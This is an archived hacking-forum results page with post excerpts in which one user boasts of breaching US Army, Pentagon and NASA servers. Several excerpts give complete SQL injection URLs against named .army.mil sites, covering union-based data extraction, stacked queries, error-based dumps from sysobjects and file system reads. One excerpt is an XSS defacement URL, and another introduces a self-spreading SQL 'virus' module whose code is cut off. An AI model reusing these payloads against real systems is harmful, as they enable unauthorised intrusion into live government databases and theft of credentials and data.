Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Current Page: 1 of 1
Results 1 - 14 of 14
4 years ago
vinnu
Well, by saying it as a module, I didn't mean the different languages' nomenclature of what a module actually is (as a module itself in SQL is something else... sorry... it became ambiguous). Instead I called it a module for myself, analogous to a code block. Secondly, u r right, it itself cannot spread beyond until we cannot add to it the XSS and ajax code blocks. In database virus/worms
Forum: News and Links
4 years ago
vinnu
Following is the SQL module of our Uday virus. This module has overpowered several govt MS SQL Server database servers across the world from US, Australia, Pakistan... etc. in recent times. The SQL module is itself fully capable of maintaining its own life until server gets restarted, otherwise the XSS provides it a trigger every next time it will get restarted. The SQL module is: ';while
Forum: News and Links
4 years ago
vinnu
Heap Spray....r u puzzled. Well heap spray attack makes use of large object initialization several times so as to flood the heap area in order to make the EIP register to point to the heap attacker controlled shellcode. The heap spray method has been effectively and heavily used against browsers using scripting languages. But the IPP-Injection is an attack subcategorised under HPP-Injection
Forum: News and Links
4 years ago
vinnu
Namaste. I'm going to unveil a new technique developed by me to hack webapps and sites. Internal Parameter Poisoning. You might've heard about HPP-injection technique in web apps and websites. Now I'm presenting a technique which can be subcategorized under the tree of HPP injection, the "IPP - Injection". IPP stands for "Internal Parameter Poisoning" and is help
Forum: News and Links
4 years ago
vinnu
And now a perfect query: http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6,7,8,9,10,11,12,13
Forum: News and Links
4 years ago
vinnu
A blind SQL injection in Pentagon server: http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=59order+by+13 The stacked queries are also working check two cases below if query returns properly it means db engine is Microsoft SQL server: http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@version and now test this: http://carlislebarracks.carlisle.
Forum: News and Links
4 years ago
vinnu
http://www.strategicstudiesinstitute.army.mil/pubs/tags.cfm?q=vinnu%3Cbr%3E%3CH1%3ELegion%20Of%20Xtremers%3C/H1%3EINDIA%3CBR%3E
Forum: News and Links
4 years ago
vinnu
Yeah, that's right. Somewhere I read that Pentagon's Cyber Security Budget is over 100 million$. This is a great amount. Another thing is that actually we talk about home PCs can be used to attack as zombie to other networks, likewise these systems can also be used for further attacks or exploration of their internal networks. In some of NASA cases same was true, the compromised database allowed
Forum: News and Links
4 years ago
vinnu
This is MS Jet database, check the file system access using SQL injection: http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+.'&pubNo=&date1=&date2=&pubDesc=
Forum: News and Links
4 years ago
vinnu
Yes, that's right. I think now they should prepare a virus like in Terminator movie to administer their huge networks automatically and that can learn and identify the problems and fix them automatically.
Forum: News and Links
4 years ago
vinnu
Check following error based injection: https://www.dms.army.mil/acro_list.cfm?startrow=30&orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int)&sort=&clear=true
Forum: News and Links
4 years ago
vinnu
Jaijeya, I don't think u know hex code conversion and the printable character range in hex numbers, if u knew it, then u might know that some hex will not be shown in printable form, u need a sniffer for this purpose. Moreover, I think u don't know the abc of Sybase yet. Moreover, check my topic on NASA posted today here. Test those sites urself. I don't know, what u understand by "Erro
Forum: News and Links
4 years ago
vinnu
Sorry Tinkode, u mistakenly copied and pasted ur SQLScanner's output, be intelligent and do it manually by using ur own brain..."vinnu"
Forum: News and Links
4 years ago
vinnu
Jaijeya I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS. The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers. The database servers deployed by them vary to nearly all type of servers on different systems l
Forum: News and Links